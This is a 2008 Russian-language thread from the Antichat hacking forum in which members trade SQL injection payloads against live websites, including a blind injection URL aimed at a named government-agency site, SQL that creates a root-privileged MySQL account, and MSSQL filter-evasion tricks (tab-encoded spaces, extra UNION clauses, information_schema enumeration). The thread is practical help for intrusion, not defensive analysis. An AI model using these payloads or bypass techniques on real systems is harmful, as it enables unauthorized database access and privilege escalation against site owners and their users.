ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

18.01.2008, 00:53
|
|
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме: 422909
Репутация:
200
|
|
Ага, там стоит старая бд! Так что придется делать инъект в слепую...
select то работает:
http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)-- 
|
|
|

18.01.2008, 02:38
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме: 122329
Репутация:
-2
|
|
Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?
|
|
|

18.01.2008, 02:52
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION
или
INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y", "Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y ");
|
|
|

18.01.2008, 19:56
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме: 122329
Репутация:
-2
|
|
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"паро ль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*
таг?) откуда столько Y :PP
|
|
|

18.01.2008, 20:11
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

19.01.2008, 17:42
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме: 38435
Репутация:
5
|
|
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\
Например
Код:
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23
вызывает ошибку
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.
т.е. строка получается:
Код:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти?
|
|
|

19.01.2008, 19:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Можно. Просто сделать второй юнион 
|
|
|

19.01.2008, 19:50
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме: 38435
Репутация:
5
|
|
Сообщение от Macro
Можно. Просто сделать второй юнион 
пробовал, но ещё бы я знал названия таблиц и колнок 
|
|
|

19.01.2008, 20:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от PunkAss
пробовал, но ещё бы я знал названия таблиц и колнок 
Ну information_schema должна быть.
Код:
script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null
Что-то типа того
|
|
|

19.01.2008, 22:24
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме: 38435
Репутация:
5
|
|
Сообщение от Macro
Что-то типа того
Блин, никак не канает
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
Код:
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|